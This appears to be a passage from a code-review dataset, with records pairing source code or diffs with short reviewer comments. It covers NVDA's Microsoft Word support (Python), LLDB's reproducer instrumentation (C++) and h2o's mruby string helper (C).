color is not None: field['color']=self.obj.winwordColorToNVDAColor(int(color)) try: languageId = int(field.pop('wdLanguageId',0)) if languageId: field['language']=languageHandler.windowsLCIDToLocaleName(languageId) except: log.debugWarning("language error",exc_info=True) pass for x in ("first-line-indent","left-indent","right-indent","hanging-indent"): v=field.get(x) if not v: continue v=float(v) if abs(v)<0.001: v=None else: v=self.obj.getLocalizedMeasurementTextForPointSize(v) field[x]=v bullet=field.get('line-prefix') if bullet and len(bullet)==1: field['line-prefix']=mapPUAToUnicode.get(bullet,bullet) return field def expand(self,unit): if unit==textInfos.UNIT_LINE: try: if self._rangeObj.tables.count>0 and self._rangeObj.cells.count==0: unit=textInfos.UNIT_CHARACTER except COMError: pass if unit==textInfos.UNIT_LINE: self._expandToLineAtCaret() elif unit==textInfos.UNIT_CHARACTER: self._rangeObj.moveEnd(wdCharacter,1) elif unit in NVDAUnitsToWordUnits: self._rangeObj.Expand(NVDAUnitsToWordUnits[unit]) else: raise NotImplementedError("unit: %s"%unit) def compareEndPoints(self,other,which): if which=="startToStart": diff=self._rangeObj.Start-other._rangeObj.Start elif which=="startToEnd": diff=self._rangeObj.Start-other._rangeObj.End elif which=="endToStart": diff=self._rangeObj.End-other._rangeObj.Start elif which=="endToEnd": diff=self._rangeObj.End-other._rangeObj.End else: raise ValueError("bad argument - which: %s"%which) if diff<0: diff=-1 elif diff>0: diff=1 return diff def setEndPoint(self,other,which): if which=="startToStart": self._rangeObj.Start=other._rangeObj.Start elif which=="startToEnd": self._rangeObj.Start=other._rangeObj.End elif which=="endToStart": self._rangeObj.End=other._rangeObj.Start elif which=="endToEnd": self._rangeObj.End=other._rangeObj.End else: raise ValueError("bad argument - which: %s"%which) def _get_isCollapsed(self): if self._rangeObj.Start==self._rangeObj.End: return True else: return False def collapse(self,end=False): if 
end: oldEndOffset=self._rangeObj.end self._rangeObj.collapse(wdCollapseEnd if end else wdCollapseStart) if end: newEndOffset = self._rangeObj.end # the new endOffset should not have become smaller than the old endOffset, this could cause an infinite loop in # a case where you called move end then collapse until the size of the range is no longer being reduced. # For an example of this see sayAll (specifically readTextHelper_generator in sayAll.py) if newEndOffset < oldEndOffset : raise RuntimeError def copy(self): return WordDocumentTextInfo(self.obj,None,_rangeObj=self._rangeObj) def _get_text(self): text=self._rangeObj.text if not text: text="" return text def _move(self,unit,direction,endPoint=None,_rangeObj=None): if not _rangeObj: _rangeObj=self._rangeObj if unit in NVDAUnitsToWordUnits: unit=NVDAUnitsToWordUnits[unit] else: raise NotImplementedError("unit: %s"%unit) if endPoint=="start": moveFunc=_rangeObj.MoveStart elif endPoint=="end": moveFunc=_rangeObj.MoveEnd else: moveFunc=_rangeObj.Move res=moveFunc(unit,direction) #units higher than character and word expand to contain the last text plus the insertion point offset in the document #However move from a character before will incorrectly move to this offset which makes move/expand contridictory to each other #Make sure that move fails if it lands on the final offset but the unit is bigger than character/word if (direction>0 and endPoint!="end" and unit not in (wdCharacter,wdWord) # moving by units of line or more and (_rangeObj.start+1) == self.obj.WinwordDocumentObject.range().end # character after the range start is the end of the document range ): return 0 return res def move(self,unit,direction,endPoint=None): if unit!=textInfos.UNIT_LINE: return self._move(unit,direction,endPoint) if direction==0 or direction>1 or direction<-1: raise NotImplementedError("moving by line is only supported collapsed and with a count of 1 or -1") oldOffset=self._rangeObj.end if endPoint=="end" else self._rangeObj.start 
newOffset=ctypes.c_long() # Try moving by line making use of the selection temporarily res=NVDAHelper.localLib.nvdaInProcUtils_winword_moveByLine(self.obj.appModule.helperLocalBindingHandle,self.obj.documentWindowHandle,oldOffset,1 if direction<0 else 0,ctypes.byref(newOffset)) if res==0: res=direction newOffset=newOffset.value if direction<0 and not endPoint and newOffset==oldOffset: # Moving backwards by line seemed to not move. # Therefore fallback to moving back a character, expanding to line and collapsing to start instead. self.move(textInfos.UNIT_CHARACTER,-1) self.expand(unit) self.collapse() elif direction>0 and not endPoint and newOffset<oldOffset: # Moving forward by line seems to have wrapped back before the original position # This can happen in some tables with merged rows. # Try moving forward by cell, but if that fails, jump past the entire table. res=self.move(textInfos.UNIT_CELL,direction,endPoint) if res==0: self.expand(textInfos.UNIT_TABLE) self.collapse(end=True) else: # the move by line using the selection succeeded. Therefore update this TextInfo's position. 
if not endPoint: self._rangeObj.setRange(newOffset,newOffset) elif endPoint=="start": self._rangeObj.start=newOffset elif endPoint=="end": self._rangeObj.end=newOffset return res def _get_bookmark(self): return textInfos.offsets.Offsets(self._rangeObj.Start,self._rangeObj.End) def _get_pointAtStart(self): left = ctypes.c_int() top = ctypes.c_int() width = ctypes.c_int() height = ctypes.c_int() try: self.obj.WinwordWindowObject.GetPoint(ctypes.byref(left), ctypes.byref(top), ctypes.byref(width), ctypes.byref(height), self._rangeObj) except COMError: raise LookupError if not any((left.value, top.value, width.value, height.value)): raise LookupError return locationHelper.Point(left.value, top.value) def updateCaret(self): self.obj.WinwordWindowObject.ScrollIntoView(self._rangeObj) self.obj.WinwordSelectionObject.SetRange(self._rangeObj.Start,self._rangeObj.Start) def updateSelection(self): self.obj.WinwordWindowObject.ScrollIntoView(self._rangeObj) self.obj.WinwordSelectionObject.SetRange(self._rangeObj.Start,self._rangeObj.End) def getMathMl(self, field): try: import mathType except: raise LookupError("MathType not installed") rangeObj = self._rangeObj.Duplicate rangeObj.Start = int(field["shapeoffset"]) obj = rangeObj.InlineShapes[0].OLEFormat try: return mathType.getMathMl(obj) except: log.debugWarning("Error fetching math with mathType", exc_info=True) raise LookupError("Couldn't get MathML from MathType") class BrowseModeWordDocumentTextInfo(browseMode.BrowseModeDocumentTextInfo,treeInterceptorHandler.RootProxyTextInfo): def __init__(self,obj,position,_rangeObj=None): if isinstance(position,WordDocument): position=textInfos.POSITION_CARET super(BrowseModeWordDocumentTextInfo,self).__init__(obj,position,_rangeObj=_rangeObj) def _get_focusableNVDAObjectAtStart(self): return self.obj.rootNVDAObject class WordDocumentTreeInterceptor(browseMode.BrowseModeDocumentTreeInterceptor): TextInfo=BrowseModeWordDocumentTextInfo def _activateLongDesc(self,controlField): 
longDesc=controlField.get('longdescription') # Translators: the title of the message dialog desplaying an MS Word table description. ui.browseableMessage(longDesc,_("Table description")) def _get_isAlive(self): return winUser.isWindow(self.rootNVDAObject.windowHandle) def __contains__(self,obj): return obj==self.rootNVDAObject def _get_ElementsListDialog(self): return ElementsListDialog def _iterHeadings(self,nodeType,direction,rangeObj,includeCurrent): neededLevel=int(nodeType[7:]) if len(nodeType)>7 else 0 isFirst=True while True: if not isFirst or includeCurrent: level=rangeObj.paragraphs[1].outlineLevel if level and 0<level<10 and (not neededLevel or neededLevel==level): rangeObj.expand(wdParagraph) yield WordDocumentHeadingQuickNavItem(nodeType,self,BrowseModeWordDocumentTextInfo(self,None,_rangeObj=rangeObj),level) isFirst=False if direction=="next": newRangeObj=rangeObj.gotoNext(wdGoToHeading) if not newRangeObj or newRangeObj.start<=rangeObj.start: break elif direction=="previous": newRangeObj=rangeObj.gotoPrevious(wdGoToHeading) if not newRangeObj or newRangeObj.start>=rangeObj.start: break rangeObj=newRangeObj def _iterNodesByType(self,nodeType,direction="next",pos=None): if pos: rangeObj=pos.innerTextInfo._rangeObj else: rangeObj=self.rootNVDAObject.WinwordDocumentObject.range(0,0) includeCurrent=False if pos else True if nodeType=="link": return LinkWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType=="annotation": comments=CommentWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() revisions=RevisionWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() return browseMode.mergeQuickNavItemIterators([comments,revisions],direction) elif nodeType in ("table","container"): return TableWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType=="error": return 
SpellingErrorWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType=="graphic": return GraphicWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType=="chart": return ChartWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType.startswith('heading'): return self._iterHeadings(nodeType,direction,rangeObj,includeCurrent) else: raise NotImplementedError def _activatePosition(self, info=None): if not info: info=self.makeTextInfo(textInfos.POSITION_CARET) info.activate() def script_nextRow(self,gesture): self.rootNVDAObject._moveInTable(row=True,forward=True) braille.handler.handleCaretMove(self) def script_previousRow(self,gesture): self.rootNVDAObject._moveInTable(row=True,forward=False) braille.handler.handleCaretMove(self) def script_nextColumn(self,gesture): self.rootNVDAObject._moveInTable(row=False,forward=True) braille.handler.handleCaretMove(self) def script_previousColumn(self,gesture): self.rootNVDAObject._moveInTable(row=False,forward=False) braille.handler.handleCaretMove(self) __gestures={ "kb:tab":"trapNonCommandGesture", "kb:shift+tab":"trapNonCommandGesture", "kb:control+alt+upArrow": "previousRow", "kb:control+alt+downArrow": "nextRow", "kb:control+alt+leftArrow": "previousColumn", "kb:control+alt+rightArrow": "nextColumn", # We want to fall back to MS Word's real page up and page down, rather than browseMode's faked 25 lines "kb:pageUp":None, "kb:pageDown":None, "kb:shift+pageUp":None, "kb:shift+pageDown":None, } class WordDocument(Window): def winwordColorToNVDAColor(self,val): if val>=0: # normal RGB value return colors.RGB.fromCOLORREF(val).name elif (val&0xffffffff)==0xff000000: # Translators: the default (automatic) color in Microsoft Word return _("default color") elif ((val>>28)&0xf)==0xd and ((val>>16)&0xff)==0x00: # An MS word color index Plus intencity # Made up of MS Word Theme Color 
index, hsv value ratio (MS Word darker percentage) and hsv saturation ratio (MS Word lighter percentage) # Info: http://www.wordarticles.com/Articles/Colours/2007.php#UIConsiderations saturationRatio=(val&0xff)/255.0 valueRatio=((val>>8)&0xff)/255.0 themeColorIndex=(val>>24)&0x0f # Convert the MS Word theme color index to an MS Office color scheme index schemeColorIndex=WdThemeColorIndexToMsoThemeColorSchemeIndex[themeColorIndex] # Lookup the rgb value for the MS Office scheme color index based on the current theme colorref=self.WinwordDocumentObject.documentTheme.themeColorScheme(schemeColorIndex).rgb # Convert the rgb value to hsv and apply the saturation and value ratios rgb=tuple(x/255.0 for x in colors.RGB.fromCOLORREF(colorref)) hsv=colorsys.rgb_to_hsv(*rgb) hsv=(hsv[0],hsv[1]*saturationRatio,hsv[2]*valueRatio) rgb=colorsys.hsv_to_rgb(*hsv) name=colors.RGB(rgb[0]*255,rgb[1]*255,rgb[2]*255).name return name else: raise ValueError("Unknown color format %x %x %x %x"%((val>>24)&0xff,(val>>16)&0xff,(val>>8)&0xff,val&0xff)) def _get_WinwordVersion(self): if not hasattr(self,'_WinwordVersion'): self._WinwordVersion=float(self.WinwordApplicationObject.version) return self._WinwordVersion def _get_documentWindowHandle(self): return self.windowHandle def _get_WinwordWindowObject(self): if not getattr(self,'_WinwordWindowObject',None): try: pDispatch=oleacc.AccessibleObjectFromWindow(self.documentWindowHandle,winUser.OBJID_NATIVEOM,interface=comtypes.automation.IDispatch) except (COMError, WindowsError): log.debugWarning("Could not get MS Word object model from window %s with class %s"%(self.documentWindowHandle,winUser.getClassName(self.documentWindowHandle)),exc_info=True) return None self._WinwordWindowObject=comtypes.client.dynamic.Dispatch(pDispatch) return self._WinwordWindowObject def _get_WinwordDocumentObject(self): if not getattr(self,'_WinwordDocumentObject',None): windowObject=self.WinwordWindowObject if not windowObject: return None 
self._WinwordDocumentObject=windowObject.document return self._WinwordDocumentObject def _get_WinwordApplicationObject(self): if not getattr(self,'_WinwordApplicationObject',None): self._WinwordApplicationObject=self.WinwordWindowObject.application return self._WinwordApplicationObject def _get_WinwordSelectionObject(self): if not getattr(self,'_WinwordSelectionObject',None): windowObject=self.WinwordWindowObject if not windowObject: return None self._WinwordSelectionObject=windowObject.selection return self._WinwordSelectionObject def _WaitForValueChangeForAction(self,action,fetcher,timeout=0.15): oldVal=fetcher() action() startTime=curTime=time.time() curVal=fetcher() while curVal==oldVal and (curTime-startTime)<timeout: time.sleep(0.01) curVal=fetcher() curTime=time.time() return curVal def script_toggleBold(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.font.bold) if val: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Bold on")) else: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Bold off")) def script_toggleItalic(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. 
For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.font.italic) if val: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Italic on")) else: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Italic off")) def script_toggleUnderline(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.font.underline) if val: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Underline on")) else: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Underline off")) def script_toggleAlignment(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. 
return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.paragraphFormat.alignment) alignmentMessages={ # Translators: a an alignment in Microsoft Word wdAlignParagraphLeft:_("Left aligned"), # Translators: a an alignment in Microsoft Word wdAlignParagraphCenter:_("centered"), # Translators: a an alignment in Microsoft Word wdAlignParagraphRight:_("Right aligned"), # Translators: a an alignment in Microsoft Word wdAlignParagraphJustify:_("Justified"), } msg=alignmentMessages.get(val) if msg: ui.message(msg) @script(gestures=["kb:control+m", "kb:control+shift+m", "kb:control+t", "kb:control+shift+t"]) def script_changeParagraphLeftIndent(self, gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, # or it's within Windows Defender Application Guard. # For now, just let the gesture through and don't report anything. return gesture.send() margin = self.WinwordDocumentObject.PageSetup.LeftMargin val = self._WaitForValueChangeForAction( lambda: gesture.send(), lambda: self.WinwordSelectionObject.paragraphFormat.LeftIndent ) msg = self.getLocalizedMeasurementTextForPointSize(margin + val) ui.message(msg) def script_toggleSuperscriptSubscript(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. 
return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: (self.WinwordSelectionObject.font.superscript,self.WinwordSelectionObject.font.subscript)) if val[0]: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Superscript")) elif val[1]: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Subscript")) else: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Baseline")) def script_moveParagraphDown(self,gesture): oldBookmark=self.makeTextInfo(textInfos.POSITION_CARET).bookmark gesture.send() if self._hasCaretMoved(oldBookmark)[0]: info=self.makeTextInfo(textInfos.POSITION_SELECTION) info.collapse() info.move(textInfos.UNIT_PARAGRAPH,-1,endPoint="start") lastParaText=info.text.strip() if lastParaText: # Translators: a message reported when a paragraph is moved below another paragraph ui.message(_("Moved below %s")%lastParaText) else: # Translators: a message reported when a paragraph is moved below a blank paragraph ui.message(_("Moved below blank paragraph")) def script_moveParagraphUp(self,gesture): oldBookmark=self.makeTextInfo(textInfos.POSITION_CARET).bookmark gesture.send() if self._hasCaretMoved(oldBookmark)[0]: info=self.makeTextInfo(textInfos.POSITION_SELECTION) info.collapse() info.move(textInfos.UNIT_PARAGRAPH,1) info.expand(textInfos.UNIT_PARAGRAPH) lastParaText=info.text.strip() if lastParaText: # Translators: a message reported when a paragraph is moved above another paragraph ui.message(_("Moved above %s")%lastParaText) else: # Translators: a message reported when a paragraph is moved above a blank paragraph ui.message(_("Moved above blank paragraph")) def script_increaseDecreaseOutlineLevel(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. 
# The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.paragraphFormat.outlineLevel) style=self.WinwordSelectionObject.style.nameLocal # Translators: the message when the outline level / style is changed in Microsoft word ui.message(_("{styleName} style, outline level {outlineLevel}").format(styleName=style,outlineLevel=val)) def script_increaseDecreaseFontSize(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.font.size) # Translators: a message when increasing or decreasing font size in Microsoft Word ui.message(_("{size:g} point font").format(size=val)) @script(gesture="kb:control+shift+8") def script_toggleDisplayNonprintingCharacters(self, gesture): if not self.WinwordWindowObject: # We cannot fetch the Word object model, so we therefore cannot report the status change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, # or it's within Windows Defender Application Guard. # In this case, just let the gesture through and don't report anything. 
return gesture.send() val = self._WaitForValueChangeForAction( lambda: gesture.send(), lambda: self.WinwordWindowObject.ActivePane.View.ShowAll ) if val: # Translators: a message when toggling Display Nonprinting Characters in Microsoft word ui.message(_("Display nonprinting characters")) else: # Translators: a message when toggling Display Nonprinting Characters in Microsoft word ui.message(_("Hide nonprinting characters")) @script(gestures=["kb:tab", "kb:shift+tab"]) def script_tab(self,gesture): """ A script for the tab key which: * if in a table, announces the newly selected cell or new cell where the caret is, or * If not in a table, announces the distance of the caret from the left edge of the document, and any remaining text on that line. """ gesture.send() self.reportTab() def reportTab(self): selectionObj=self.WinwordSelectionObject inTable=selectionObj.tables.count>0 if selectionObj else False info=self.makeTextInfo(textInfos.POSITION_SELECTION) isCollapsed=info.isCollapsed if inTable and isCollapsed: info.expand(textInfos.UNIT_PARAGRAPH) isCollapsed=info.isCollapsed if not isCollapsed: speech.speakTextInfo(info, reason=controlTypes.OutputReason.FOCUS) braille.handler.handleCaretMove(self) if selectionObj and isCollapsed: offset=selectionObj.information(wdHorizontalPositionRelativeToPage) msg=self.getLocalizedMeasurementTextForPointSize(offset) ui.message(msg) if selectionObj.paragraphs[1].range.start==selectionObj.start: info.expand(textInfos.UNIT_LINE) speech.speakTextInfo(info, unit=textInfos.UNIT_LINE, reason=controlTypes.OutputReason.CARET) def getLocalizedMeasurementTextForPointSize(self,offset): options=self.WinwordApplicationObject.options useCharacterUnit=options.useCharacterUnit if useCharacterUnit: offset=offset/self.WinwordSelectionObject.font.size # Translators: a measurement in Microsoft Word return _("{offset:.3g} characters").format(offset=offset) else: unit=options.measurementUnit if unit==wdInches: offset=offset/72.0 # Translators: a 
measurement in Microsoft Word return _("{offset:.3g} inches").format(offset=offset) elif unit==wdCentimeters: offset=offset/28.35 # Translators: a measurement in Microsoft Word return _("{offset:.3g} centimeters").format(offset=offset) elif unit==wdMillimeters: offset=offset/2.835 # Translators: a measurement in Microsoft Word return _("{offset:.3g} millimeters").format(offset=offset) elif unit==wdPoints: # Translators: a measurement in Microsoft Word return _("{offset:.3g} points").format(offset=offset) elif unit==wdPicas: offset=offset/12.0 # Translators: a measurement in Microsoft Word # See http://support.microsoft.com/kb/76388 for details. return _("{offset:.3g} picas").format(offset=offset) def script_changeLineSpacing(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. 
return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda:self.WinwordSelectionObject.ParagraphFormat.LineSpacingRule) if val == wdLineSpaceSingle: # Translators: a message when switching to single line spacing in Microsoft word ui.message(_("Single line spacing")) elif val == wdLineSpaceDouble: # Translators: a message when switching to double line spacing in Microsoft word ui.message(_("Double line spacing")) elif val == wdLineSpace1pt5: # Translators: a message when switching to 1.5 line spaceing in Microsoft word ui.message(_("1.5 line spacing")) def initOverlayClass(self): if isinstance(self, EditableTextWithoutAutoSelectDetection): self.bindGesture("kb:alt+shift+home", "caret_changeSelection") self.bindGesture("kb:alt+shift+end", "caret_changeSelection") self.bindGesture("kb:alt+shift+pageUp", "caret_changeSelection",) self.bindGesture("kb:alt+shift+pageDown", "caret_changeSelection",) __gestures = { "kb:control+[":"increaseDecreaseFontSize", "kb:control+]":"increaseDecreaseFontSize", "kb:control+shift+,":"increaseDecreaseFontSize", "kb:control+shift+.":"increaseDecreaseFontSize", "kb:control+b":"toggleBold", "kb:control+i":"toggleItalic", "kb:control+u":"toggleUnderline", "kb:control+=":"toggleSuperscriptSubscript", "kb:control+shift+=":"toggleSuperscriptSubscript", "kb:control+l":"toggleAlignment", "kb:control+e":"toggleAlignment", "kb:control+r":"toggleAlignment", "kb:control+j":"toggleAlignment", "kb:alt+shift+downArrow":"moveParagraphDown", "kb:alt+shift+upArrow":"moveParagraphUp", "kb:alt+shift+rightArrow":"increaseDecreaseOutlineLevel", "kb:alt+shift+leftArrow":"increaseDecreaseOutlineLevel", "kb:control+shift+n":"increaseDecreaseOutlineLevel", "kb:control+alt+1":"increaseDecreaseOutlineLevel", "kb:control+alt+2":"increaseDecreaseOutlineLevel", "kb:control+alt+3":"increaseDecreaseOutlineLevel", "kb:control+1":"changeLineSpacing", "kb:control+2":"changeLineSpacing", "kb:control+5":"changeLineSpacing", "kb:control+pageUp": 
"caret_moveByLine", "kb:control+pageDown": "caret_moveByLine", } class WordDocument_WwN(WordDocument): def _get_documentWindowHandle(self): w=NVDAHelper.localLib.findWindowWithClassInThread(self.windowThreadID,u"_WwG",True) if not w: log.debugWarning("Could not find window for class _WwG in thread.") w=super(WordDocument_WwN,self).documentWindowHandle return w def _get_WinwordWindowObject(self): window=super(WordDocument_WwN,self).WinwordWindowObject if not window: return None try: return window.application.activeWindow.activePane except COMError: log.debugWarning("Unable to get activePane") return window.application.windows[1].activePane __gestures={ "kb:tab":None, "kb:shift+tab":None, } class ElementsListDialog(browseMode.ElementsListDialog): ELEMENT_TYPES=(browseMode.ElementsListDialog.ELEMENT_TYPES[0],browseMode.ElementsListDialog.ELEMENT_TYPES[1], # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("annotation", _("&Annotations")), # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("chart", _("&Charts")), # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("error", _("&Errors")), )
1
33,835
This line is unnecessary.
nvaccess-nvda
py
@@ -119,13 +119,4 @@ Recorder::~Recorder() { UpdateBoundary(); } -void Recorder::Log(unsigned id) { -#ifndef LLDB_REPRO_INSTR_TRACE - LLDB_LOG(GetLogIfAllCategoriesSet(LIBLLDB_LOG_API), "Recording {0}: {1}", id, - m_pretty_func); -#else - llvm::errs() << "Recording " << id << ": " << m_pretty_func << "\n"; -#endif -} - bool lldb_private::repro::Recorder::g_global_boundary;
1
//===-- ReproducerInstrumentation.cpp ---------------------------*- C++ -*-===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// #include "lldb/Utility/ReproducerInstrumentation.h" #include "lldb/Utility/Reproducer.h" using namespace lldb_private; using namespace lldb_private::repro; void *IndexToObject::GetObjectForIndexImpl(unsigned idx) { return m_mapping.lookup(idx); } void IndexToObject::AddObjectForIndexImpl(unsigned idx, void *object) { assert(idx != 0 && "Cannot add object for sentinel"); m_mapping[idx] = object; } template <> char *Deserializer::Deserialize<char *>() { return const_cast<char *>(Deserialize<const char *>()); } template <> const char *Deserializer::Deserialize<const char *>() { auto pos = m_buffer.find('\0'); if (pos == llvm::StringRef::npos) return nullptr; const char *str = m_buffer.data(); m_buffer = m_buffer.drop_front(pos + 1); return str; } bool Registry::Replay(const FileSpec &file) { auto error_or_file = llvm::MemoryBuffer::getFile(file.GetPath()); if (auto err = error_or_file.getError()) return false; return Replay((*error_or_file)->getBuffer()); } bool Registry::Replay(llvm::StringRef buffer) { #ifndef LLDB_REPRO_INSTR_TRACE Log *log = GetLogIfAllCategoriesSet(LIBLLDB_LOG_API); #endif Deserializer deserializer(buffer); while (deserializer.HasData(1)) { unsigned id = deserializer.Deserialize<unsigned>(); #ifndef LLDB_REPRO_INSTR_TRACE LLDB_LOG(log, "Replaying {0}: {1}", id, GetSignature(id)); #else llvm::errs() << "Replaying " << id << ": " << GetSignature(id) << "\n"; #endif GetReplayer(id)->operator()(deserializer); } return true; } void Registry::DoRegister(uintptr_t RunID, std::unique_ptr<Replayer> replayer, SignatureStr signature) { const unsigned id = m_replayers.size() + 1; 
assert(m_replayers.find(RunID) == m_replayers.end()); m_replayers[RunID] = std::make_pair(std::move(replayer), id); m_ids[id] = std::make_pair(m_replayers[RunID].first.get(), std::move(signature)); } unsigned Registry::GetID(uintptr_t addr) { unsigned id = m_replayers[addr].second; assert(id != 0 && "Forgot to add function to registry?"); return id; } std::string Registry::GetSignature(unsigned id) { assert(m_ids.count(id) != 0 && "ID not in registry"); return m_ids[id].second.ToString(); } Replayer *Registry::GetReplayer(unsigned id) { assert(m_ids.count(id) != 0 && "ID not in registry"); return m_ids[id].first; } std::string Registry::SignatureStr::ToString() const { return (result + (result.empty() ? "" : " ") + scope + "::" + name + args) .str(); } unsigned ObjectToIndex::GetIndexForObjectImpl(const void *object) { unsigned index = m_mapping.size() + 1; auto it = m_mapping.find(object); if (it == m_mapping.end()) m_mapping[object] = index; return m_mapping[object]; } Recorder::Recorder(llvm::StringRef pretty_func, std::string &&pretty_args) : m_serializer(nullptr), m_pretty_func(pretty_func), m_pretty_args(pretty_args), m_local_boundary(false), m_result_recorded(true) { if (!g_global_boundary) { g_global_boundary = true; m_local_boundary = true; LLDB_LOG(GetLogIfAllCategoriesSet(LIBLLDB_LOG_API), "{0} ({1})", m_pretty_func, m_pretty_args); } } Recorder::~Recorder() { assert(m_result_recorded && "Did you forget LLDB_RECORD_RESULT?"); UpdateBoundary(); } void Recorder::Log(unsigned id) { #ifndef LLDB_REPRO_INSTR_TRACE LLDB_LOG(GetLogIfAllCategoriesSet(LIBLLDB_LOG_API), "Recording {0}: {1}", id, m_pretty_func); #else llvm::errs() << "Recording " << id << ": " << m_pretty_func << "\n"; #endif } bool lldb_private::repro::Recorder::g_global_boundary;
1
19,981
How did this compile in the first place? Is there a matching declaration in a header that should be removed too?
apple-swift-lldb
cpp
@@ -56,7 +56,8 @@ mrb_value h2o_mruby__new_str(mrb_state *mrb, const char *s, size_t len, const ch if (mrb->exc != NULL) h2o_mruby__abort_exc(mrb, "h2o_mruby_new_str:precondition failure", file, line); mrb_value ret = mrb_str_new(mrb, s, len); - h2o_mruby_assert(mrb); + if (mrb->exc != NULL) + h2o_mruby__abort_exc(mrb, "h2o_mruby_new_str:failed to create string:", file, line); return ret; }
1
/* * Copyright (c) 2014-2016 DeNA Co., Ltd., Kazuho Oku, Ryosuke Matsumoto, * Masayoshi Takahashi * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. 
